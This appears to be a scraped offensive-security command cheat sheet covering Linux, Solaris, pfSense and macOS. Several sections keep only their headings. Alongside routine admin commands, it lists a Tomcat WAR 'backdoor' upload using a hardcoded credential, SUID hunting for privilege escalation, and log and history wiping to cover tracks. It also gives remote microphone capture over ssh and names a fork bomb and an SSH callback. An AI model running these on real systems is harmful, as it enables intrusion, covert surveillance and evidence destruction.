Nix
Linux
Network commands
Command
Explanation
watch ss -tp
Network communication
netstat -ant
TCP or UDP communication (-anu for UDP)
netstat -tulpn
Communication with PIDs
lsof -i
Established communication
smb://ip/share
Access an SMB share
share user x.x.x.x c$
Mount a Windows share
smbclient -U user //ip/share
Connect to SMB
ifconfig eth# ip/cidr
Set IP and netmask
ifconfig eth0:1 ip/cidr
Virtual interface setting
route add default gw gw_ip
Set the default gateway
ifconfig eth# mtu [size]
Change the MTU size
export MAC=xx:xx:xx:xx:xx:xx
Change the MAC
ifconfig int hw ether MAC
Change the MAC
macchanger -m MAC int
Change the MAC in BackTrack
iwlist int scan
Wi-Fi scanner
nc -lvvp port
Listening to a specific port
python3 -m http.server port
Create a web server
dig -x ip
Identifying the domains of an ip
host ip
Identifying the domains of an ip
host -t SRV _service._tcp.url.com
Look up the SRV records of the domain
dig @ip domain -t AXFR
DNS zone transfer
host -l domain namesvr
DNS zone transfer
ip xfrm state list
Show available VPN
ip addr add ip/cidr dev eth0
Add ‘hidden’ interface
grep DHCP /var/log/messages
List DHCP log entries
tcpkill host ip and port port
Blocking ip:port
echo "1" > /proc/sys/net/ipv4/ip_forward
Enable IP Forwarding
echo "nameserver x.x.x.x" >> /etc/resolv.conf
Add DNS server
showmount -e ip
Show the NFS shares exported by ip
mkdir /site_backups; mount -t nfs ip:/ /site_backups
Mount the NFS share exported by ip
System information
Command
Explanation
nbtstat -A ip
Get hostname for ip
id
Current username
w
Logged in user
who -a
User information
last -a
The last logged in user
ps -ef
Available system processes (or use top)
df -h
The amount of disk usage (or using free)
uname -a
Show the kernel version along with the processor structure
mount
Show mounted file systems
getent passwd
Display the list of users
PATH=$PATH:/home/mypath
Add variable to PATH
kill pid
Kill process with pid
cat /etc/issue
Display operating system information
cat /etc/*release*
Display operating system version information
cat /proc/version
Display kernel version information
rpm --query --all
Installed packages (in Redhat)
rpm -ivh *.rpm
Install RPM packages (-e to remove)
dpkg --get-selections
Installed packages (in Ubuntu)
dpkg -i *.deb
Install DEB packages (-r to remove)
pkginfo
Installed packages (on Solaris)
which tcsh/csh/ksh/bash
Display the paths of executable files
chmod 750 tcsh/csh/ksh
Disable the shell and force the use of bash
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
Finding files with suid
find / -uid 0 -perm -4000 -type f 2>/dev/null
Finding files with suid
find / -writable ! -user $(whoami) -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
Show writable files
Functional commands
Command
Explanation
python -c "import pty;pty.spawn('/bin/bash')"
Interactive shell
wget http://url -O url.txt -o /dev/null
Fetch the URL
rdesktop ip
Remote desktop to ip
scp /tmp/file user@x.x.x.x:/tmp/file
Send file
scp user@remoteip:/tmp/file /tmp/file
Get the file
useradd -m user
Add user
passwd user
Change user password
rmuser uname
Delete user
script -a outfile
Record the shell session: Ctrl-D to stop
apropos subject
Related commands
history
History of user commands
!num
Execute line num from history
ssh2john.py id_rsa > ssh-key
Find the passphrase
john ssh-key
Find the passphrase
ssh -i id_rsa user@ip
Connect with key and passphrase
id -u
Get user id
cut -d: -f3 < <(getent group GROUPNAME)
Get group id
curl -G 'http://example.com/file.php' --data-urlencode 'cmd=echo ssh-rsa AA………..'
Sending information with the GET method in curl
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exploit.war "http://megahosting.com:8080/manager/text/deploy?path=/exploit.war"
Create backdoor with lfi vulnerability in java
File commands
collection of lines
diff file file2
Compare two files
rm -rf dir
Force recursive deletion of a directory
shred -f -u file
Overwrite and delete the file
touch -r ref file
Match the file's timestamp to that of ref
touch -t YYYYMMDDhhmm file
Set file timestamp
sudo fdisk -l
List connected drives
mount /dev/sda# /mnt/usbkey
Mounting usb devices
md5sum -t file
Compute the MD5 hash of the file
echo -n "str" | md5sum
Generate md5 hash
sha1sum file
The SHA1 hash of the file
sort -u
Sort and display unique lines
grep -c "str" file
Count lines containing str
grep -Hnri word * | vim -
Search for the desired word in files along with the file name
grep -rial word
Files containing the desired word
tar cf file.tar files
Create .tar from files
tar xf file.tar
Extract .tar
tar czf file.tar.gz files
Create .tar.gz
tar xzf file.tar.gz
Extract .tar.gz
tar cjf file.tar.bz2 files
Create .tar.bz2
tar xjf file.tar.bz2
Extract .tar.bz2
gzip file
Compress the file (renamed to file.gz)
gzip -d file.gz
Decompress file.gz
upx -9 -o out.exe orig.exe
Pack orig.exe with UPX
zip -r zipname.zip \Directory\*
Create zip
dd skip=1000 count=2000 bs=1 if=file of=file2
Separate 1 to 3 KB from the file
split -b 9K file prefix
Split the file into 9 KB sections
awk 'sub("$","\r")' unix.txt > win.txt
Convert to a Windows-compatible txt file
find . -type f -iname '*.pdf'
Search for PDF files
find / \( -perm -4000 -o -perm -2000 \) -exec ls -ldb {} \;
Search for setuid and setgid files
dos2unix file
Switch to *nix format
file file
Determine the file type and format
chattr (+/-)i file
setting or not setting the immutable bit
while [ $? -eq 0 ]; do cd flag/; done
Enter infinite nested folder
Miscellaneous commands
Command
Explanation
unset HISTFILE
Disable history logging
ssh user@ip arecord - | aplay -
Remote microphone recording
gcc -o outfile myfile.c
Compile C, C++
init 6
Restart (0 = shutdown)
cat /etc/*syslog*.conf | grep -v "^#"
List of log files
grep 'href=' file | cut -d"/" -f3 | grep url | sort -u
Extract links for url.com
dd if=/dev/urandom of=file bs=3145728 count=100
Create a 3 MB file
Controller commands
Command
Explanation
echo "" > /var/log/auth.log
Clear the auth.log file
echo "" > ~/.bash_history
Delete the session history of the current user
rm ~/.bash_history -rf
Delete the file .bash_history
history -c
Delete the session history of the current user
export HISTFILESIZE=0
Setting the maximum lines of the history file to zero
export HISTSIZE=0
Setting the maximum number of commands in the history file to zero
unset HISTFILE
delete history (need to log in again to apply)
kill -9 $$
Kill the current session
ln /dev/null ~/.bash_history -sf
Permanently send all history commands to /dev/null
File system structure
Position
Explanation
/bin
System binary files
/boot
Files related to the boot process
/dev
Interfaces related to system devices
/etc
System configuration files
/home
A basic place for users and libraries
/opt
Essential software libraries
/proc
Running and system process information
/root
The base path for the root user
/sbin
Executable files for the root user
/tmp
Temporary files
/usr
Less critical files
/var
Variable system files
Files
File
Explanation
/etc/shadow
Password hashes of local users
/etc/passwd
Local users
/etc/group
Local groups
/etc/rc.d
Startup services
/etc/init.d
Services
/etc/hosts
List of hostnames and IPs
/etc/HOSTNAME
Show hostname along with domain
/etc/network/interfaces
Network interface configuration
/etc/profile
System environment variables
/etc/apt/sources.list
List of Ubuntu package sources
/etc/resolv.conf
Nameserver settings
/home/user/.bash_history
bash history (also in /root/)
/usr/share/wireshark/manuf
MAC Manufacturer
~/.ssh/
Location of ssh keystores
/var/log
System log files (for Linux)
/var/adm
System log files (for Unix)
/var/spool/cron
List of files in cron
/var/log/apache/access.log
Apache connection log
/etc/fstab
Static file system information
Using powershell
Installation
Login using username and password
Create symlink
Script writing
Create Ping sweep
Automating the domain name resolve process in the bash script
Creating a Fork bomb (Creating a process to crash the system)
dns reverse lookup process
Do not block Ip script
Create SSH Callback
Iptables command
Use ip6tables for IPv6
iptables-save -c > file
Extract iptables rules and save to file
iptables-restore file
Restore iptables rules
iptables -L -v --line-numbers
List of all rules with their line number
iptables -F
Flush all rules
iptables -P INPUT/FORWARD/OUTPUT ACCEPT/REJECT/DROP
Change the default policy applied when no rule matches
iptables -A INPUT -i interface -m state --state RELATED,ESTABLISHED -j ACCEPT
Allow established connections on INPUT
iptables -D INPUT 7
Delete the 7th inbound rule
iptables -t raw -L -n
Increase throughput by disabling statefulness
iptables -P INPUT DROP
Drop all packets
Allow ssh and port 22 in outbound
Allow ICMP in outbound
Create port forward
Allow 1.1.1.0/24 and port 80,443 and create log in /var/log/messages
Update-rc.d file
Check and create launcher
service --status-all
[+] Service starts at boot
[-] Service does not start
service service start
start service
service service stop
stop service
service service status
Check service status
update-rc.d -f service remove
Remove the existing system startup service (-f for the /etc/init.d file if it already exists)
update-rc.d service defaults
Add service to system startup
Chkconfig
Available in red hat distributions such as centos and oracle
Command
Explanation
chkconfig --list
List of available services and their run status
chkconfig service --list
The status of a service
chkconfig service on [--level 3]
Add the service [its run level can also be specified]
chkconfig service off [--level 3] e.g. chkconfig iptables off
Remove the service
Screen command
Command
Explanation
screen -S name
Create a new screen with the name
screen -ls
List of running screens
screen -r name
Attach to the screen with the name
screen -S name -X cmd
Send command to screen with the name
C-a ?
List of key combinations (help)
C-a d
Detach
C-a D D
Detach and log out
C-a c
Create a new window
C-a C-a
Switch to the last window
C-a ' num|name
Switch to the window with that number or name
C-a "
Show window list and switch
C-a k
Kill the current window
C-a S
Horizontal separation of the display
C-a V
Vertical separation of the display
C-a tab
Jump to the last screen
C-a X
Remove the current region
C-a Q
Remove all regions except the current one
X11
Remote recording of X11 window and changing its format to JPG
Open X11 in stream mode
TCPDump command
Record packets in eth0 and change it from ASCII and hex and save it in the file
Recording of all traffic 2.2.2.2
Show all ip connections
Show all ping outputs
Record 50 dns packets and display timestamp
Kali default commands
Equivalent to WMIC
Mount SMB shared space
KALI UPDATE
Checking the operating system for the possibility of upgrading access
List of all processes with root access
The PFSENSE command
Command
Explanation
pfSsh.php
pfSense shell
pfSsh.php playback enableallowallwan
Allow inbound connections on the WAN (adds a hidden rule to the WAN rules)
pfSsh.php playback enablesshd
Enable inbound/outbound ssh
pfctl -sn
Show NAT rules
pfctl -sr
Show filter rules
pfctl -sa
Show all rules
viconfig
Edit settings
rm /tmp/config.cache
Remove the cached (backup) settings after editing
/etc/rc.reload_all
Reload the entire configuration
SOLARIS operating system
Command
Explanation
ifconfig -a
List of all interfaces
netstat -in
List of all interfaces
netstat -r
List of routes
ifconfig eth0 dhcp
Start the DHCP client
ifconfig eth0 plumb up ip netmask nmask
IP setting
route add default ip
Gateway setting
logins -p
List of users without passwords
svcs -a
List of all services along with status
prstat -a
Status of processes (also command top)
svcadm start ssh
Start the SSH service
inetadm -e telnet (-d for disable)
Enable telnet
prtconf | grep Memory
Total physical memory
iostat -En
Hard disk size
showrev -c /usr/bin/bash
Binary information
shutdown -i6 -g0 -y
Restart the system
dfmounts
List of users connected to NFS
smc
GUI management
snoop -d int -c pkt # -o results.pcap
Packet recording
/etc/vfstab
Mounted system file table
/var/adm/loginlog
Log of login attempts
/etc/default/*
Default settings
/etc/system
Kernel modules and settings
/var/adm/messages
syslog path
/etc/auto_*
Automounter settings file
/etc/inet/ipnodes
IPv4 and IPv6 hosts files
Important cache files
File
Description
~/.viminfo
vim editor file
Mac
Situational Awareness
Command
Explanation
top
shows real-time system statistics including CPU usage, memory usage, and running processes.
ps aux
displays a list of running processes with their associated details.
netstat
displays active network connections, routing tables, and a number of network interface and protocol statistics.
shows all active network connections and which processes are using them.
tcpdump
allows the capture and analysis of network traffic.
tail -f /var/log/system.log
displays real-time updates to the macOS system log.
log show --predicate 'process == "PROCESS_NAME"' --info
displays system log entries for a specific process.
fs_usage
shows real-time file system activity, including which files are being accessed and by which processes.
fseventer
displays a graphical representation of file system activity.
dtrace
allows the tracing and analysis of system events.
launchctl list
displays a list of all currently loaded launch daemons and agents.
User Plist File Enumeration
Command
Explanation
/Users/<username>/Library/Preferences/.GlobalPreferences.plist
The user plist file for the currently logged-in user can be found in here
/Users/<username>/Library/Preferences/
Other user plist files can be found in here
defaults read <path_to_plist_file>
Read a plist file
defaults write <path_to_plist_file> <key> <value>
Write a plist file
defaults delete <path_to_plist_file> <key>
Delete a key from a plist file
PlistBuddy -c "Open <path_to_plist_file>"
Open a plist file
PlistBuddy -c "Print <key>" <path_to_plist_file>
Print a value from a plist file
PlistBuddy -c "Add <key> <type> <value>" <path_to_plist_file>
Add a new key-value pair to a plist file
PlistBuddy -c "Delete <key>" <path_to_plist_file>
Delete a key from a plist file
PlistBuddy -c "Set <key> <value>" <path_to_plist_file>
Set the value of a key in a plist file
plutil -lint <path_to_plist_file>
Validate a plist file
plutil -convert xml1 <path_to_plist_file>
Convert a plist file to XML format
User & Group
Command
Explanation
sudo dscl . -create /Users/newusername
create a new user
sudo dscl . -passwd /Users/newusername password
set the user’s password
sudo dscl . -append /Groups/admin GroupMembership newusername
make the user an administrator
sudo dseditgroup -o create -r "Group Name" groupname
create a new group
sudo dseditgroup -o edit -a username -t user groupname
add users to the group
dscl . -read /Groups/groupname GroupMembership
list the members of a group
sudo dseditgroup -o delete groupname
delete a group
sudo dseditgroup -o edit -d username -t user groupname
remove a user from a group
sudo dseditgroup -o edit -n newgroupname -r oldgroupname
rename a group